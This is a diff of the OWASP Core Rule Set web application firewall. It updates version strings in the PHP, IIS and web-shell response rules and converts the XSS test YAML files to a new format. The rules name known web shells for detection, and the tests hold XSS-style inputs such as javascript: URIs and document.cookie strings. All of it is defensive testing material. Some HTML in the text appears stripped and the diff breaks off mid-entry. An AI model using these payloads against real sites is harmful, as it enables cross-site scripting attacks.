@@ -33,7 +33,7 @@ SecRule RESPONSE_BODY "@pmFromFile php-errors.data" \ tag:'OWASP_CRS',\ tag:'capec/1000/118/116',\ tag:'PCI/6.5.6',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'ERROR',\ setvar:'tx.outbound_anomaly_score_pl1=+%{tx.error_anomaly_score}'" SecRule RESPONSE_BODY "@rx (?:\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\$_(?:(?:pos|ge)t|session))\b" \ @@ -52,7 +52,7 @@ SecRule RESPONSE_BODY "@rx (?:\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scan tag:'OWASP_CRS',\ tag:'capec/1000/118/116',\ tag:'PCI/6.5.6',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'ERROR',\ setvar:'tx.outbound_anomaly_score_pl1=+%{tx.error_anomaly_score}'" SecRule RESPONSE_BODY "@rx (?i)<\?(?:=|php)?\s+" \ @@ -71,11 +71,11 @@ SecRule RESPONSE_BODY "@rx (?i)<\?(?:=|php)?\s+" \ tag:'OWASP_CRS',\ tag:'capec/1000/118/116',\ tag:'PCI/6.5.6',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'ERROR',\ setvar:'tx.outbound_anomaly_score_pl1=+%{tx.error_anomaly_score}'" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:953013,phase:3,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-RESPONSE-953-DATA-LEAKAGES-PHP" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:953014,phase:4,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-RESPONSE-953-DATA-LEAKAGES-PHP" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:953013,phase:3,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-RESPONSE-953-DATA-LEAKAGES-PHP" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:953014,phase:4,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-RESPONSE-953-DATA-LEAKAGES-PHP" SecRule RESPONSE_BODY "@pmFromFile php-errors-pl2.data" \ "id:953101,\ phase:4,\ 
@@ -92,11 +92,11 @@ SecRule RESPONSE_BODY "@pmFromFile php-errors-pl2.data" \ tag:'OWASP_CRS',\ tag:'capec/1000/118/116',\ tag:'PCI/6.5.6',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'ERROR',\ setvar:'tx.outbound_anomaly_score_pl2=+%{tx.error_anomaly_score}'" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:953015,phase:3,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-RESPONSE-953-DATA-LEAKAGES-PHP" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:953016,phase:4,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-RESPONSE-953-DATA-LEAKAGES-PHP" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:953017,phase:3,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-RESPONSE-953-DATA-LEAKAGES-PHP" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:953018,phase:4,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-RESPONSE-953-DATA-LEAKAGES-PHP" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:953015,phase:3,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-RESPONSE-953-DATA-LEAKAGES-PHP" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:953016,phase:4,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-RESPONSE-953-DATA-LEAKAGES-PHP" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:953017,phase:3,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-RESPONSE-953-DATA-LEAKAGES-PHP" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:953018,phase:4,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-RESPONSE-953-DATA-LEAKAGES-PHP" SecMarker "END-RESPONSE-953-DATA-LEAKAGES-PHP" diff --git a/rules/@owasp_crs/RESPONSE-954-DATA-LEAKAGES-IIS.conf b/rules/@owasp_crs/RESPONSE-954-DATA-LEAKAGES-IIS.conf index b953853..8b8315a 100644 --- a/rules/@owasp_crs/RESPONSE-954-DATA-LEAKAGES-IIS.conf +++ b/rules/@owasp_crs/RESPONSE-954-DATA-LEAKAGES-IIS.conf 
@@ -1,5 +1,5 @@ # ------------------------------------------------------------------------ -# OWASP CRS ver.4.4.0 +# OWASP CRS ver.4.5.0 # Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. # Copyright (c) 2021-2024 CRS project. All rights reserved. # @@ -13,10 +13,10 @@ SecRule RESPONSE_HEADERS:Content-Encoding "@pm gzip compress deflate br zstd" \ pass,\ nolog,\ tag:'OWASP_CRS',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ skipAfter:END-RESPONSE-954-DATA-LEAKAGES-IIS" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:954011,phase:3,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-RESPONSE-954-DATA-LEAKAGES-IIS" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:954012,phase:4,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-RESPONSE-954-DATA-LEAKAGES-IIS" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:954011,phase:3,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-RESPONSE-954-DATA-LEAKAGES-IIS" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:954012,phase:4,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-RESPONSE-954-DATA-LEAKAGES-IIS" SecRule RESPONSE_BODY "@rx [a-z]:\x5cinetpub\b" \ "id:954100,\ phase:4,\ @@ -33,7 +33,7 @@ SecRule RESPONSE_BODY "@rx [a-z]:\x5cinetpub\b" \ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/118/116',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'ERROR',\ setvar:'tx.outbound_anomaly_score_pl1=+%{tx.error_anomaly_score}'" SecRule RESPONSE_BODY "@rx (?:Microsoft OLE DB Provider for SQL Server(?:.{1,20}?error '800(?:04005|40e31)'.{1,40}?Timeout expired| \(0x80040e31\)
Timeout expired
)|

internal server error

.*?

part of the server has crashed or it has a configuration error\.

|cannot connect to the server: timed out)" \ @@ -53,7 +53,7 @@ SecRule RESPONSE_BODY "@rx (?:Microsoft OLE DB Provider for SQL Server(?: tag:'OWASP_CRS',\ tag:'capec/1000/118/116',\ tag:'PCI/6.5.6',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'ERROR',\ setvar:'tx.outbound_anomaly_score_pl1=+%{tx.error_anomaly_score}'" SecRule RESPONSE_BODY "@pmFromFile iis-errors.data" \ @@ -73,7 +73,7 @@ SecRule RESPONSE_BODY "@pmFromFile iis-errors.data" \ tag:'OWASP_CRS',\ tag:'capec/1000/118/116',\ tag:'PCI/6.5.6',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'ERROR',\ setvar:'tx.outbound_anomaly_score_pl1=+%{tx.error_anomaly_score}'" SecRule RESPONSE_STATUS "!@rx ^404$" \ 
@@ -93,17 +93,17 @@ SecRule RESPONSE_STATUS "!@rx ^404$" \ tag:'OWASP_CRS',\ tag:'capec/1000/118/116',\ tag:'PCI/6.5.6',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'ERROR',\ chain" SecRule RESPONSE_BODY "@rx \bServer Error in.{0,50}?\bApplication\b" \ "capture,\ t:none,\ setvar:'tx.outbound_anomaly_score_pl1=+%{tx.error_anomaly_score}'" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:954013,phase:3,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-RESPONSE-954-DATA-LEAKAGES-IIS" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:954014,phase:4,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-RESPONSE-954-DATA-LEAKAGES-IIS" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:954015,phase:3,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-RESPONSE-954-DATA-LEAKAGES-IIS" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:954016,phase:4,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-RESPONSE-954-DATA-LEAKAGES-IIS" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:954017,phase:3,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-RESPONSE-954-DATA-LEAKAGES-IIS" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:954018,phase:4,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-RESPONSE-954-DATA-LEAKAGES-IIS" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:954013,phase:3,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-RESPONSE-954-DATA-LEAKAGES-IIS" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:954014,phase:4,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-RESPONSE-954-DATA-LEAKAGES-IIS" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:954015,phase:3,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-RESPONSE-954-DATA-LEAKAGES-IIS" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:954016,phase:4,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-RESPONSE-954-DATA-LEAKAGES-IIS" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" 
"id:954017,phase:3,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-RESPONSE-954-DATA-LEAKAGES-IIS" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:954018,phase:4,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-RESPONSE-954-DATA-LEAKAGES-IIS" SecMarker "END-RESPONSE-954-DATA-LEAKAGES-IIS" diff --git a/rules/@owasp_crs/RESPONSE-955-WEB-SHELLS.conf b/rules/@owasp_crs/RESPONSE-955-WEB-SHELLS.conf index 2097c7c..90cc991 100644 --- a/rules/@owasp_crs/RESPONSE-955-WEB-SHELLS.conf +++ b/rules/@owasp_crs/RESPONSE-955-WEB-SHELLS.conf @@ -1,5 +1,5 @@ # ------------------------------------------------------------------------ -# OWASP CRS ver.4.4.0 +# OWASP CRS ver.4.5.0 # Copyright (c) 2006-2020 Trustwave and contributors. (not) All rights reserved. # Copyright (c) 2021-2024 CRS project. All rights reserved. # @@ -13,10 +13,10 @@ SecRule RESPONSE_HEADERS:Content-Encoding "@pm gzip compress deflate br zstd" \ pass,\ nolog,\ tag:'OWASP_CRS',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ skipAfter:END-RESPONSE-955-WEB-SHELLS" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:955011,phase:3,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-RESPONSE-955-WEB-SHELLS" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:955012,phase:4,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-RESPONSE-955-WEB-SHELLS" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:955011,phase:3,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-RESPONSE-955-WEB-SHELLS" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:955012,phase:4,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-RESPONSE-955-WEB-SHELLS" SecRule RESPONSE_BODY "@pmFromFile web-shells-php.data" \ "id:955100,\ phase:4,\ 
@@ -31,7 +31,7 @@ SecRule RESPONSE_BODY "@pmFromFile web-shells-php.data" \ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/225/122/17/650',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" SecRule RESPONSE_BODY "@rx (r57 Shell Version [0-9.]+|r57 shell)" \ @@ -48,7 +48,7 @@ SecRule RESPONSE_BODY "@rx (r57 Shell Version [0-9.]+|r57 tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/225/122/17/650',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" SecRule RESPONSE_BODY "@rx ^<html><head><meta http-equiv='Content-Type' content='text/html; charset=Windows-1251'><title>.*? - WSO [0-9.]+" \ @@ -65,7 +65,7 @@ SecRule RESPONSE_BODY "@rx ^.*" \ @@ -82,7 +82,7 @@ SecRule RESPONSE_BODY "@rx B4TM4N SH3LL.*Mini Shell.*Developed By LameHacker" \ @@ -99,7 +99,7 @@ SecRule RESPONSE_BODY "@rx Mini Shell.*Developed By LameHacker" \ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/225/122/17/650',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" SecRule RESPONSE_BODY "@rx \.:: .* ~ Ashiyane V [0-9.]+ ::\." \ @@ -116,7 +116,7 @@ SecRule RESPONSE_BODY "@rx \.:: .* ~ Ashiyane V [0-9.]+ ::\." \ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/225/122/17/650',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" SecRule RESPONSE_BODY "@rx Symlink_Sa [0-9.]+" \ 
@@ -133,7 +133,7 @@ SecRule RESPONSE_BODY "@rx Symlink_Sa [0-9.]+" \ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/225/122/17/650',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" SecRule RESPONSE_BODY "@rx CasuS [0-9.]+ by MafiABoY" \ @@ -150,7 +150,7 @@ SecRule RESPONSE_BODY "@rx CasuS [0-9.]+ by MafiABoY" \ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/225/122/17/650',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" SecRule RESPONSE_BODY "@rx ^\r\n\r\nGRP WebShell [0-9.]+ " \ @@ -167,7 +167,7 @@ SecRule RESPONSE_BODY "@rx ^<html>\r\n<head>\r\n<title>GRP WebShell [0-9.]+ " \ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/225/122/17/650',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" SecRule RESPONSE_BODY "@rx <small>NGHshell [0-9.]+ by Cr4sh</body></html>\n$" \ @@ -184,7 +184,7 @@ SecRule RESPONSE_BODY "@rx <small>NGHshell [0-9.]+ by Cr4sh</body></html>\n$" \ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/225/122/17/650',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" SecRule RESPONSE_BODY "@rx <title>SimAttacker - (?:Version|Vrsion) : [0-9.]+ - " \ @@ -201,7 +201,7 @@ SecRule RESPONSE_BODY "@rx <title>SimAttacker - (?:Version|Vrsion) : [0-9.]+ - " tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/225/122/17/650',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" SecRule RESPONSE_BODY "@rx ^<!DOCTYPE html>\n<html>\n<!-- By Artyum .*<title>Web Shell" \ @@ -218,7 +218,7 @@ SecRule RESPONSE_BODY "@rx ^\n\n" \ 
@@ -269,7 +269,7 @@ SecRule RESPONSE_BODY "@rx ^PHP Web Shell\r\n\r\n\r\n tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/225/122/17/650',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" SecRule RESPONSE_BODY "@rx ^\n\n
Input command :
\n
" \ @@ -286,7 +286,7 @@ SecRule RESPONSE_BODY "@rx ^\n\n
\n\nRu24PostWebShell " \ @@ -303,7 +303,7 @@ SecRule RESPONSE_BODY "@rx ^<html>\n<head>\n<title>Ru24PostWebShell " \ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/225/122/17/650',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" SecRule RESPONSE_BODY "@rx <title>s72 Shell v[0-9.]+ Codinf by Cr@zy_King" \ @@ -320,7 +320,7 @@ SecRule RESPONSE_BODY "@rx s72 Shell v[0-9.]+ Codinf by Cr@zy_King\r\n\r\n\r\nPhpSpy Ver [0-9]+" \ @@ -337,7 +337,7 @@ SecRule RESPONSE_BODY "@rx ^\r\n\r\n\n\n\n\ng00nshell v[0-9.]+ " \ @@ -354,7 +354,7 @@ SecRule RESPONSE_BODY "@rx ^ <html>\n\n<head>\n\n<title>g00nshell v[0-9.]+ " \ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/225/122/17/650',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" SecRule RESPONSE_BODY "@contains <title>punkholicshell" \ @@ -371,7 +371,7 @@ SecRule RESPONSE_BODY "@contains punkholicshell" \ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/225/122/17/650',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" SecRule RESPONSE_BODY "@rx ^\n \n azrail [0-9.]+ by C-W-M" \ @@ -388,7 +388,7 @@ SecRule RESPONSE_BODY "@rx ^\n \n azrail [0- tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/225/122/17/650',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" SecRule RESPONSE_BODY "@rx >SmEvK_PaThAn Shell v[0-9]+ coded by <a href=" \ 
@@ -405,7 +405,7 @@ SecRule RESPONSE_BODY "@rx >SmEvK_PaThAn Shell v[0-9]+ coded by <a href=" \ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/225/122/17/650',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" SecRule RESPONSE_BODY "@rx ^<html>\n<title>.*? ~ Shell I\n\n" - version: "HTTP/1.1" - output: - log_contains: id "941170" - - test_title: 941170-3 + - input: + dest_addr: 127.0.0.1 + method: POST + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/post" + data: "payload=javascript:/*-->" + version: "HTTP/1.1" + output: + log: + expect_ids: [941170] + - test_id: 3 desc: 'Test first backslash match (javascript:(?:[\s\S]+[=\x5c\(\[\.<]) with: javascript: \\\\t (extra backslashes to work around rule transformations)' stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: GET - port: 80 - uri: "/get?var=javascript:%20%5C%5C%5C%5Ct" - headers: - Accept: "*/*" - User-Agent: "OWASP CRS test agent" - Host: localhost - version: "HTTP/1.1" - output: - log_contains: id "941170" - - test_title: 941170-4 + - input: + dest_addr: 127.0.0.1 + method: GET + port: 80 + uri: "/get?var=javascript:%20%5C%5C%5C%5Ct" + headers: + Accept: "*/*" + User-Agent: "OWASP CRS test agent" + Host: localhost + version: "HTTP/1.1" + output: + log: + expect_ids: [941170] + - test_id: 4 desc: 'Test second backslash match (javascript:(?:...|\x5c[ux]\d)) with: javascript:\\\\u0020 (extra backslashes to work around rule transformations)' stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: GET - port: 80 - uri: "/get?var=javascript:%5C%5C%5C%5Cu0020" - headers: - Accept: "*/*" - User-Agent: "OWASP CRS test agent" - Host: localhost - version: "HTTP/1.1" - output: - log_contains: id "941170" - - test_title: 941170-5 + - input: + dest_addr: 
127.0.0.1 + method: GET + port: 80 + uri: "/get?var=javascript:%5C%5C%5C%5Cu0020" + headers: + Accept: "*/*" + User-Agent: "OWASP CRS test agent" + Host: localhost + version: "HTTP/1.1" + output: + log: + expect_ids: [941170] + - test_id: 5 desc: "Status Page Test - data: , as GET variable" stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: GET - port: 80 - uri: "/get?test=%20data%3A%20%2C%20%3Cx%3E" - headers: - Accept: "*/*" - User-Agent: "OWASP CRS test agent" - Host: localhost - version: "HTTP/1.1" - output: - log_contains: id "941170" + - input: + dest_addr: 127.0.0.1 + method: GET + port: 80 + uri: "/get?test=%20data%3A%20%2C%20%3Cx%3E" + headers: + Accept: "*/*" + User-Agent: "OWASP CRS test agent" + Host: localhost + version: "HTTP/1.1" + output: + log: + expect_ids: [941170] diff --git a/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941180.yaml b/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941180.yaml index ba33b77..a6a7c74 100644 --- a/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941180.yaml +++ b/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941180.yaml 
@@ -1,125 +1,123 @@ --- meta: author: "zmallen, azurit" - enabled: true - name: "941180.yaml" - description: "Tests to trigger, or not trigger 941180" +rule_id: 941180 tests: - - test_title: 941180-1 + - test_id: 1 desc: Node-validator deny list keywords, ARGS stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: POST - port: 80 - uri: "/post/foo" - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - data: '941180-1=window.location' - version: "HTTP/1.1" - output: - log_contains: id "941180" - - test_title: 941180-2 + - input: + dest_addr: 127.0.0.1 + method: POST + port: 80 + uri: "/post/foo" + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + data: '941180-1=window.location' + version: "HTTP/1.1" + output: + log: + expect_ids: [941180] + - test_id: 2 desc: Node-validator deny list keywords, ARGS_NAMES stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: POST - port: 80 - uri: "/post/bar" - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - data: 'document.cookie=941180-2' - version: "HTTP/1.1" - output: - log_contains: id "941180" - - test_title: 941180-3 + - input: + dest_addr: 127.0.0.1 + method: POST + port: 80 + uri: "/post/bar" + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + data: 'document.cookie=941180-2' + version: "HTTP/1.1" + output: + log: + expect_ids: [941180] + - test_id: 3 desc: Node-validator deny list keywords, ARGS_NAMES stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: GET - port: 80 - uri: "/get/baz" - headers: - 
User-Agent: "OWASP CRS test agent" - Host: localhost - Cookie: 'window.location=941180-3' - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - version: "HTTP/1.1" - output: - log_contains: id "941180" - - test_title: 941180-4 + - input: + dest_addr: 127.0.0.1 + method: GET + port: 80 + uri: "/get/baz" + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Cookie: 'window.location=941180-3' + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + log: + expect_ids: [941180] + - test_id: 4 desc: Negative test for Node-validator deny list keyword -->, present in stricter sibling 941181, ARGS stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: POST - port: 80 - uri: "/post/foo" - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - data: '941180-4=-->' - version: "HTTP/1.1" - output: - no_log_contains: id "941180" - - test_title: 941180-5 + - input: + dest_addr: 127.0.0.1 + method: POST + port: 80 + uri: "/post/foo" + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + data: '941180-4=-->' + version: "HTTP/1.1" + output: + log: + no_expect_ids: [941180] + - test_id: 5 desc: "XSS with embedded shell execution attempt (batch script)" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=\"-->'-->`-->" - version: HTTP/1.0 - output: - log_contains: id "941180" - - test_title: 941180-6 + - input: + dest_addr: 127.0.0.1 + headers: + Host: 
localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=\"-->'-->`-->" + version: HTTP/1.0 + output: + log: + expect_ids: [941180] + - test_id: 6 desc: "Node-validator deny list keywords, ARGS, issue #2512" stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: POST - port: 80 - uri: "/post/bar" - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - data: 'arg=...(document.domain)...' - version: "HTTP/1.1" - output: - log_contains: id "941180" - - test_title: 941180-7 + - input: + dest_addr: 127.0.0.1 + method: POST + port: 80 + uri: "/post/bar" + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + data: 'arg=...(document.domain)...' + version: "HTTP/1.1" + output: + log: + expect_ids: 